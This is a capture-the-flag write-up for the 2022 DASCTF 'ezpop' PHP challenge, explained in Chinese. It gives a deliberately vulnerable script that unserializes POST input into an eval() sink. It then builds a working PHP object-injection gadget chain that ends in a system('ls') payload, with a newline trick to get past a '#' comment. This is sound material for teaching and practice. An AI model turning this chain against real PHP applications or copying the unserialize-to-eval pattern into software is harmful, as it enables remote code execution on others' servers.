[2022DASCTF]ezpop
<?php
class crow
{
    public $v1;
    public $v2;
    // Instantiates whatever class name is stored in $v1 (with $v2 as the
    // constructor argument) and echoes the result, which would call that
    // object's __toString(). Not used by the chain described below.
    function eval() {
        echo new $this->v1($this->v2);
    }
    // Gadget: fires when the object is called as a function. It invokes
    // world() on $v1; if $v1 is an object without a world() method, that
    // object's __call() handler runs instead.
    public function __invoke()
    {
        $this->v1->world();
    }
}
class fin
{
    public $f1;
    // Entry point of the chain: runs automatically when the object produced
    // by unserialize() is destroyed. The '.' concatenation converts $f1 to a
    // string, so an object stored in $f1 has its __toString() called.
    public function __destruct()
    {
        echo $this->f1 . '114514';
    }
    // Calls $f1 as a function (an object in $f1 has its __invoke() called).
    public function run()
    {
        ($this->f1)();
    }
    // Catches calls to undefined methods on this object and forwards them
    // to $f1->get_flag(); $a (method name) and $b (arguments) are ignored.
    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }
}
class what
{
    public $a;
    // Runs when the object is used as a string (echo / '.' concatenation);
    // pivots to $a->run() before returning the literal 'hello'.
    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;
    // Calls $m1 as a function (an object in $m1 has its __invoke() called).
    public function run()
    {
        ($this->m1)();
    }
    // Sink: eval() on $m1, which unserialize() lets the client set. The
    // prepended '#' only comments out the first line, so anything in $m1
    // after a newline is executed as PHP.
    public function get_flag()
    {
        eval('#' . $this->m1);
    }
}
// Untrusted-input sink: unserialize() on raw POST data lets the client
// instantiate any of the classes above with arbitrary property values, so
// their magic methods (__destruct/__toString/__call/__invoke) run on
// client-chosen data. Mitigation: never unserialize user input — use
// json_decode() instead, or at minimum pass ['allowed_classes' => false].
if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}
?>
入口：fin 的 __destruct（反序列化得到的对象被销毁时自动调用）
public function __destruct()
{
echo $this->f1 . '114514';
}
$a=new fin()（入口 __destruct 中有字符串拼接，会把 f1 转成字符串，正好 what 有 __toString） --> f1=new what()
public function __toString()
{
$this->a->run();
return 'hello';
}
$b=new what(); --> a=new mix()（fin 和 mix 都有 run()，fin 已在链上，这里选还没用到的 mix）
public $m1;
public function run()
{
($this->m1)();
}
$c=new mix(); -->m1=new crow();
public function __invoke()
{
$this->v1->world();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
crow 的 __invoke 调用 $this->v1->world()，fin 没有 world() 方法，于是触发 fin 的 __call
$a2=new fin();
public function get_flag()
{
eval('#' . $this->m1);
}
fin 的 __call 调用 $this->f1->get_flag()，跳到 mix 的 get_flag()，即 eval 所在的最终执行点
最后，完整的链构造如下：
<?php
// Property-only stand-in for the challenge class: serialize() emits just the
// class name and properties, so the methods are not needed here.
class crow
{
    public $v1;
    public $v2;
}
// Property-only stand-in for the challenge class (see note on crow above).
class fin
{
    public $f1;
}
// Property-only stand-in for the challenge class (see note on crow above).
class what
{
    public $a;
}
// Property-only stand-in for the challenge class (see note on crow above).
class mix
{
    public $m1;
}
// Object graph that, once unserialized on the target, walks
// fin::__destruct -> what::__toString -> mix::run -> crow::__invoke
// -> fin::__call -> mix::get_flag (the eval sink).
$a=new fin();
$b=new what();
$c=new mix();
$d=new crow();
$a2=new fin();
$c2=new mix();
$a->f1=$b;
$b->a=$c;
$c->m1=$d;
$d->v1=$a2;
$a2->f1=$c2;
// The leading newline terminates the '#' comment that get_flag() prepends,
// so the second line reaches eval().
$c2->m1="
system(\"ls\");"; // 'cat *' to view
echo urlencode(serialize($a))
?>
这里在 m1 开头加一个换行来绕过 eval 前面的 #：# 注释只到行尾为止，换行之后的内容仍会被 eval 执行
$c2->m1="system(\"ls\");";
$c2->m1="
system(\"ls\");";
解:
绕过 eval 前面的 # 的方法：在载荷前加一个回车（换行）